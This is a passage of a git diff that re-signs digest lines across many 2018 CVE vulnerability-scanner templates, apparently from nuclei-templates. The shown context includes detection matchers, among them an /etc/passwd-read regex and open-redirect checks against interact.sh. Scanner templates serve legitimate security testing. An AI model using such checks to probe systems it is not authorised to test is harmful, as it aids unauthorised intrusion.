4a0a0047304502202dd28b31608a43a3c4493267bee160bb0604051c8b413fceb611ee5bf2f78a560221009055db2ddb25f781a71fc23746b17aca5f10baf45be8f347f20ef73c917bfbca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10942.yaml b/http/cves/2018/CVE-2018-10942.yaml index 8c69a4a890..439df260bd 100644 --- a/http/cves/2018/CVE-2018-10942.yaml +++ b/http/cves/2018/CVE-2018-10942.yaml @@ -75,4 +75,4 @@ http: group: 1 regex: - '(.*?)\|\|\|\|' -# digest: 4b0a00483046022100aab26195eec27b220d615f8c9e60fbab9ae457867d1c4209eb5ae8cacfb3ca18022100a4cb00aa3b61687473a5a2627c73a4958334b53104f383a1c2e6513d003484a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5c0be9fdc84b3fd3d3c130d309b587ec77fd52be876838eddbba234cc28e715022100b42d341387c2ef8750f784db06da3e27e35d0cff6d77ae88c43ea4725c1ca3b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 7b8a92335a..0bef67a5c0 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f4b3ba62ada360ed542a1dc3aeb23fe810a3516b33b87653ac8cc1e848028c5b0221009dcb0edfc90ad78d55ad83bcfc106071329ffdb8ca67a671481c79a10b2a61cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002c0da9e8011d65dab80c630bf30cb61029cb0fc68d1a0b5b7de1f11b65ba50b022100d10b2577aae04e1cb2447339fb423e147328096fafe2e7dfa63a3c87b876f4d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 556ee22841..efc806c9f4 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022074cd3bf33b0ec1ad4b73a00fa8f4cfde3b82a43929ed109dd58ad53b67201676022076a0f365907066a7d10d38ff9db65c72da72a1cf7dfce6c3a44502c6ae55bdcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9e55724df8749ace8f579f6c441325aed843527785b06dc7575d60426297d970220098c8c73fed3d1499735eb40da07fabb36db006d2d8ecb643cb55996bc35aa28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 27054a7f07..ccdd6b9943 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b713a4f66f9d5d0e0c1621cb4d7346a8391dfcb9840a579aaf892c3aa5d3b62102210084e5a59025b33e6a132de272f100fa98b4e5478c6ffc88166ad534afe06b9d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf46cae11d86cd1de5f9dadb6eaacc3a59275c483617d1b09f441671815032620220701cf5a3bee3b755f16c7a9cd42976913debedf9914a004e5acc5ab96c9820ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index bffafebce3..c2cf62f4c7 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -71,4 +71,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body -# digest: 490a004630440220740d343390daffdaa2e4889d6c8f3c60262ea0f8dfefa267015b150d60eb9c46022072f2d72c1ca4e16ec3ce633cf0ad2ae4a154180871ea90d771a74a50410a9bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022036c1c6320032b7d766da8547f80ca65da333066602f3c266752775429737766e022100df63b38dfd53ec3807a099db7b983469085a94bc866637ce7a4da3a1f8c7137a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index c2e50ddc0d..4975a82ea5 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022020b9433d2689cd1c916656c6593704d52cdc82d3cae348cb23bbd6b903fa6e4102210093789a3005ae04750511962961e6ce2b78f9e2bdb3cd2d6871867fa439c29424:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207421366c244f2a469b78e683d33433ea6d7c8268abf6e0e8090bbfb449d240d202203fdb385d1e1838f118286e940d02d935d99b18bc9ab0657fd3edcf1210203932:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 525db1a5fc..2b8a43c127 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022041afb53374b858558cfa721e985551966ce7288cec93b493945ea139d7386f8402205f4e5b293d6960714f5f73b027b4e94ae9e1807296b861ed9b23392772a3be60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100938ac8228345eddd038c98eda80c1dd2c91c011b112fd03901c57fa214b320ae02210087ae996c5447b94a35b1756c4b5fa32348fcb342d1182163594151eac3b250b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 3d29a731da..7989de9eaa 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab1c51e0504628fe004acf4adeb03221ca6e19060ece841c357bd983b6d698760221009d5e783a014ec2025efc6cb4589970bba73805b98312143cd27a9ac719bdee2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eaabc7db1807fc929001ebb7e618de3e40c1278290fd8ebf70728eb103cf8c2402203e66b8cb08ccd31c52735f7647ad71582aa2bf25aa797c7fd2c1b7387c995f83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 0a78bab8e9..fd94e8bf70 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -49,4 +49,4 @@ http: negative: true status: - 404 -# digest: 4a0a00473045022056187efc1263a71f2d8b32f9de3c5f204e1f0e14a74e5c6414adcc71e2baef0f022100c535f4d342896061392e41c1198b95e62d3934b01628ac2a8a8bfdd16547d8ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ede843a93cd7c543ab76b7e16334cef004e6cb38d973d677b0e973ca732b6d0c022059ab20c40bda233e9cbcb62f029375e1ab0ab8d446fb593bd171dac749c4cb48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 44a17c7f65..20be64b068 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab34469cfcefff232919bd56d0ecb10087647817db9eba51fae678e7630e51e002202f79da64c606d1225444596f885702817709284e378c496818f3ee1144ce6188:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa5f6c95e56ff7e46e8bb58d0cf8c30e0a6788c3a1378618619c2e0a8c7ae11902201bd725976214247dc0fecb41fc5b6e3213a728cbee903a11d4945a7de4f4404d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index abb34c7602..e029096e0d 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -51,4 +51,4 @@ http: regex: - '"version": "([0-9.]+)"' part: body -# digest: 4a0a00473045022060c783658faf40b7f9a34361eed36da0f94e1675b8f33ff246b9f4aeb1fb5154022100c74444ed55f597dff4be9289ccea933ff13cd951323438b922cd89b639507c63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eea6124ab2717f89f34103874e7c2f3d232178d78b14c8c4c93c2358076dd57702207a7f9ab3aae93592eb2adfbd00c2e38e3632f23fa3aed618d162a876c7ce255b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 4dc0fdc60e..2a6238d209 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b3dfe85d30990abdfc76926f79fc0972052a3bf24374013a6ed622a5fac500f402202ad50a628af7526e0eca73ed3a88133d9c9e4962c830fcc5b7e868563bedb40e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009dfce0d02b5695b72b5abb8cf9079405d12ade3adcfc1c5bb25e4b725d8926ee02202fa0abf4ea932a109e72c5a67f552de24aa8c6fe91c634debed351d5be5d2e64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index deeaed9bcc..359bdefacf 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009efa0514463053230c63b5f90705314d9e80a1a472ea48bb9da85b5c9779ee6402206c0ec7976f0ef1416debde9235f1b2a274324bd6782667980cd9288d6c90b06b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b44e1f59ab1d35b1079bbeecba8fabbcc3d662db03dd9feebe186ea1526671f022100c1cd55fbb8aae22f862d0894cf82b08ecdbd72d84263a165885987f10d83a5c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 0789ff6ee6..0c32cd9593 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed0b29ad551cb1c8046e44ccfeb468882574d4d84131408c68bd1df5afd26cfa022075bd7e7320c9c33dad093dd40822990e12fc84791e76510619255948ce4ba1cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022070d438b8deca8262b388a1ac84d7a28612a28f7eb0ec72da39762e02a9ab2c6e02205bdbf452ac32f90703c55fbb539c9a91679e39359fcbaf302d82948f56a6b57b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 307b4d29ec..7c9a0a106d 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -41,4 +41,4 @@ http: part: body words: - '<META http-equiv="Refresh" content="0;URL=http://interact.sh">' -# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f687e998ebd40e7f6e0cd7750ccdc2f8cd832181f93aa0404dd46ea313b3754502200c2cbb0e94b7ac91d20cd6904518d07f26788a7f5ba5f1318552e687577c3e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index c1035c0910..82fa5984d6 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022029c3380bdfd5118230de31f228fa1f4e5f2888d9bd277fe8ac5d3a84562a79f5022036b5eb64e2ed0675f3fc8179c9692ed6a466c35c7e8f0af65d4256edaec216c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8dc70bf72aa6d2c7fbe2e2c55aff27c85410de59599fde3c1e37aa7ca9e354202206242c50d362c74213733b6b42877aadf4cc58cbb8aaf1d5b615b051ca566a2a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 8921fad110..7ccfefb35a 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100995e04bbc6df48317be210a749a2ac8a731b0e7bfa4d547e026075349e5190cc022100d0c88986a6df82ebc03e665d29d294e7d0ba57cdb72c09407727cee0689e6c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e147e540018e89eb8892a229a98bbab99feca5c6f1416e246e0264aa28dd539022100c3f35f328d7fc8c2c5141f428a2585389f9262293b5bccb23bd929c7798c2374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 1cae4d01e3..cf3a399d3d 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -40,4 +40,4 @@ http: part: body regex: - '^var fgt_lang =' -# digest: 4b0a00483046022100ed688fb687003137454ccb27e917dd0a47b6effc89bb9404707395186fce0efd0221008586aa2b87390aed0dd185af0e8a536f991a73de918ddcad55a7bc3acfdbc0fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220259917bb43137924f23094b16480365fa1e3839c5fca4713af8f2f63008f58d202210082449a7709741b6ff30609ecff6d86e847e2517c01cba5c4694973ee94fa9ca5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index da29fe40f3..1f6241640e 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206ce45dc62265ae4f6192bec17dcdd2579840de84d6a70b1d94b162f3c44d36300221009e122123ca302b8c7791dae1933312958f9d3f1e0e89daf77aaa2b2dd224bd2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082af42871fa237fbd8e44fca7400eefd815f0228679b14a47eef8e58bf9bd2c30220677acd9c0f102308eef360373ba7b6611d2e1c1a2d5a909ed06667e3a9812e01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index df6be56a15..413e751f73 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220228e9d192f56704740750f3a51ad746dcfc7ca200431ce286c6b232e1803320e022100e58e67a71cef0a53f5d448ad997bd96cc2c3380c4a78a356c1af321cd3367885:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203224fda196eb1cbc81b68a79d58afaed6d9d7d9c8821fbcc463a6bc0e7295ad4022059cbe8295c4346847a37bf4a6db45ed614ead696931c35f803ddd046ee3c3c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 10802111ee..d80782ef1c 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f46ca25bae61a8c58a2d3c73103864b52d0333002e1c2422e184eef65e1321b022070c5d6a65e7a9734927fdd6fed6fedc1651f044f5268dd3a44c0d7550fb33f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090246985aa33f0e41c9ed59146b95be1f9cdf7ab26257777ce98c063ed12309c02202b81c53a22187906b5e2321ac991e64fe0ee52372aee7f041ea1d9de847edb66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index c4498e6831..6f1620e74e 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100f2adff2da944fbe9a1b29f662efd016ead45875d2e06992cd9e61e573f5877f4022100d08b0890924b7addb0673fc531f213922f2e4e23760f5dbca533566a40845382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203794f97eb985e7b51a642cd485979e762edf2fa8b530829012c75ba4e3091830022100a2ffa6b6686a57dc714d016096bfc2ae7990e9e9d11a3514fa51cd92a05fe911:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 50c5926871..8bde4688f3 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 301 -# digest: 4b0a004830460221009caa5018de3f67f939a8bcb172921b8986a43ff83a2c7628413233ec2433c2af0221009d8028df2af32e3128aa06fe627e6d4c10fe49894f9539685a34e7f1a00e83ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bedaae748e6aaf48b9c690e95cc9f56486416f4d42f946b7db3201185738e9b8022100f1b531a7f5d0c01c6c14cb2238b20ca9ec8bb63947c1bef07d0adcd8f59cc6f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index b6d5efdc15..cddf9426d8 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d6532de8059fab7fd78681f2120fb2a87cd3cb86792239d399ddefff43a1c3ac022100fcebf55316c2ace6c35b49754ffeb2a9ebe30f47a7b5437981e19da9b5545f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009214b35bc48d118e49903f07e951d276886bb2e963f35ada6608986e8379df6602202b9b26b182e0feccd8855c0eeeefbd4e71305d040621695262cf1b5336fe9b04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index f5bf97e49f..30e32db710 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022043b6d593685732c05b518667af8e2a87711364d9dba4b0f64504a93eae54f2d9022100c5bf2364a2dd3724e40859f816ee1840a3245ed1a33f2273abf587916684486e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201431da7cb7d0c6f1cc9fe645c0cb50a7fd2bd61e9bf77564ef03316199d1e4f6022100f8c96bfcbbe4073e99071df37061329f4acf9403c04049f844f8d7c713c2ab0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index c2e66e6be1..02090d2feb 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ea28cd5779d252530f7f2854d3fec0aff9d51c4a5018f72ded4673441416d97022023e6c65fcf320c34b9df8210e07125951e511ab0661c65c758241634aa5c6b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac853014f271b944b9ee20135ae63f4f05560df732d9ffb2d4a315c1298854da02202669480469ad9fa8caf3ecac955cda21d510d1dabc69069dd5fbc3ff497533b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 7fb0af70ea..ebb1b7959d 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402201be780a4469ea0a8738f8438126c71d69f8d31d05d6839b39986254edf0db41402207b1a3a25c0738e82ca020983b3a8445e0463f65171558f9d5011fdcafecd6853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f0f25f2551f0a387e62f98821d148b071d8feeb62c016ee0a73491fbef4b47c02210083dd29779ff7f5309807d128bb88de8a1a1aa9ca767c5b36f90a3313fc9bb651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 636a38d5fe..6e42b8366e 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -39,4 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100b339ad6df9268d6b897b9c6b3faae2d6ea097baf206beafbf09c0a0f1c14b0d40221009cac5ad6cdb667b20025da67357b1151ebce73e32b71995292f1d60d7a43e50e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e26f46ac8fa0fbf78f910c608f41335ab410d944ba39bd21b4a25bf3f366b2c70221008bcd07b274e596cc4f0004c5167e46e1e2955692de90e4d0356634f1390bb2b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 577811a98e..1d233eb624 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203c4ddbcd4e1d9a14a467c108e82ff87b32ec9351cb237830dd61e9ade6527fd0022040b2a10a4d6e4ce8557f04d663b75210e2f1e9ff391b65f66608c885c794c323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc45ca6bc462dfa12f3816a1d91516eb665c5c4890cbdc399651e65cb9d55488022100bc6fa04ba3a8224f267355833878b5b57b1da1a0cc82659bf3019b7aa6bd7c80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 2a0195b5ec..f2a35a1f74 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dc9985c42c6ada43064e760b5d0e9e7c91e0c13be081b6667a4578d416a3f8ac022100b49638b1fa7561d27698d6962f89f45384b44df899a37f6e01d94674e4651cd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009ca9821ca84e3035987df97624dd5b8883b8c4849fc29b8142652e4e7d0080610220312c12edb16e29c072a827155cdebc39f586b5d5c69b398cb846e2c7d93792da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index 068a749ecc..1db18b2221 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022032c0d3a3e6d2ec456254c10a587dc9efa108903eec34e0f3e026c6d76ef4d65602201978070aa018f55066f9722f3e9f66834c105641573a6528eeb51a9ee6e03480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203412aba03e7df739713f759fcb37bef1eea1d3999931083f45827e66691d050f022100bfeb476846fd53627a129ee79b9bb245ee5f7a9c8fa80b019225676c03b850b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 8051dbeca7..e9bddd04e4 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -78,4 +78,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022079a0f0e0bdc7376e1343de468e02f8dd25505916ea291f52a4b4672bb49f58c6022045414437bbe18a49102cd5f18a1434331c158de4796d2340acbe64d8b9f82767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c705261b07bb3b5134ebe70f694bcf5598515f94687a58001eccb1f58fb9e6002206cc7bf1c42677820f7b501bd2aeed96acae06ab3780e0481a51780a3a7e97c7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 7fc5089482..b01dcb1143 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022033723090a9b4a81b792ed6ecdaf230faf72fd66022ed67fae3697f90eff3b012022043a029915f1b514beac428b24c0629be457217dbe22ec11838076265cb09e9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ed92c577723c47cb124f92446376127d6b6b6fcd2f6431bbbfe68e31a967e7b022017675d53de48db41cb32b1ba9e129efe88f22de8ef6b0bc3627c9470229ff9cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index a7865f4a1b..417ee6ca3a 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and -# digest: 4a0a0047304502202b1aa5555d71a8aca48bc022946bcdce1d30c66d55e0d3674a071d4f71c612ee022100956080f91d3386d400a3993d774251f5a2649171c661633597a767552865238a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204299459be2a55a288065e032b7726f84a36e94e06623cdc89bc6cbfe1f06f73402201a6086d0a7faeced068ec0dd8aa934238754b35510074d06c3671d2b5e93f945:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 48403dbf14..72474e0253 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -44,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - http -# digest: 490a004630440220391e666a4ba5604bb62fcd1ca7396a502fb6f43913e9cd3c14529faf765f1464022047bf7f2d790f04727bd7e93e901f9af13a8077b286023e0a843688319ccf9df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100952a1352dd220013331b92a16c56b5dbbf5c5b182026eed1fe8c66a80f18c3f20221008371d2a7719b97ddcef29d12f4bbb58467f8d043fa3f24801eada79ea643b899:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index ef4e429b1a..24a5cdb12b 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -38,4 +38,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 